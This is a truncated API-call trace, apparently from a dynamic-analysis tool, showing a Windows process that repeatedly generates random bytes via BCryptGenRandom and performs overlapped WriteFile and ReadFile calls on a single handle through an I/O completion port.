0x0 [0203.338] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.339] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.339] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.339] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.339] free (_Block=0x3e305b8) [0203.339] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.339] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.339] free (_Block=0x1fa91d0) [0203.339] free (_Block=0x1fa2ed8) [0203.339] free (_Block=0x1fa90b8) [0203.339] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.340] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.340] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.340] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.348] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xbc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.348] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.348] CloseHandle (hObject=0x2a8) returned 1 [0203.348] free (_Block=0x3df0008) [0203.348] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.354] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.355] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.355] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.355] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.355] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.355] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.355] free (_Block=0x3e305b8) [0203.355] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.355] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.356] free (_Block=0x1fa91d0) [0203.356] free (_Block=0x1fa2ed8) [0203.356] free (_Block=0x1fa90b8) [0203.356] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.356] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.356] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.356] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.364] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x44, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.364] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.364] CloseHandle (hObject=0x2a8) returned 1 [0203.364] free (_Block=0x3df0008) [0203.364] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.371] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.371] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.371] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.371] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.372] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.372] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.372] free (_Block=0x3e305b8) [0203.372] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.372] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.372] free (_Block=0x1fa91d0) [0203.372] free (_Block=0x1fa2ed8) [0203.372] free (_Block=0x1fa90b8) [0203.372] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.373] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.373] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.373] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.381] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.381] CloseHandle (hObject=0x2a8) returned 1 [0203.382] free (_Block=0x3df0008) [0203.382] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.388] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.388] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.388] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.388] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.389] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.389] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.389] free (_Block=0x3e305b8) [0203.389] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.389] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.389] free (_Block=0x1fa91d0) [0203.389] free (_Block=0x1fa2ed8) [0203.389] free (_Block=0x1fa90b8) [0203.389] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.389] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.389] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.390] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.398] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x45b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.398] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.398] CloseHandle (hObject=0x2a8) returned 1 [0203.398] free (_Block=0x3df0008) [0203.398] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.404] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.404] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.404] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.405] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.405] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.405] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.405] free (_Block=0x3e305b8) [0203.405] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.405] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.405] free (_Block=0x1fa91d0) [0203.405] free (_Block=0x1fa2ed8) [0203.405] free (_Block=0x1fa90b8) [0203.405] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.406] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.406] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.406] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.414] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xf0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.414] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.414] CloseHandle (hObject=0x2a8) returned 1 [0203.414] free (_Block=0x3df0008) [0203.414] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.421] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.421] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.421] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.422] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.422] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.422] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.422] free (_Block=0x3e305b8) [0203.422] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.422] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.422] free (_Block=0x1fa91d0) [0203.422] free (_Block=0x1fa2ed8) [0203.422] free (_Block=0x1fa90b8) [0203.422] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.423] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.431] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xdb, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.431] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.431] CloseHandle (hObject=0x2a8) returned 1 [0203.431] free (_Block=0x3df0008) [0203.431] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.438] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.439] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.439] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.439] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.439] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.439] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.440] free (_Block=0x3e305b8) [0203.440] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.440] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.440] free (_Block=0x1fa91d0) [0203.440] free (_Block=0x1fa2ed8) [0203.440] free (_Block=0x1fa90b8) [0203.440] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.440] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.441] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.441] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.449] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xbf, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.449] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.449] CloseHandle (hObject=0x2a8) returned 1 [0203.450] free (_Block=0x3df0008) [0203.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.455] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.455] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.455] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.456] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.456] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.456] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.456] free (_Block=0x3e305b8) [0203.456] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.456] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.456] free (_Block=0x1fa91d0) [0203.456] free (_Block=0x1fa2ed8) [0203.456] free (_Block=0x1fa90b8) [0203.456] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.457] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.465] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.465] CloseHandle (hObject=0x2a8) returned 1 [0203.465] free (_Block=0x3df0008) [0203.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.474] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.475] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.475] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.475] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.475] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.475] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.475] free (_Block=0x3e305b8) [0203.475] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.475] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.476] free (_Block=0x1fa91d0) [0203.476] free (_Block=0x1fa2ed8) [0203.476] free (_Block=0x1fa90b8) [0203.476] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.476] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.476] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.476] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, 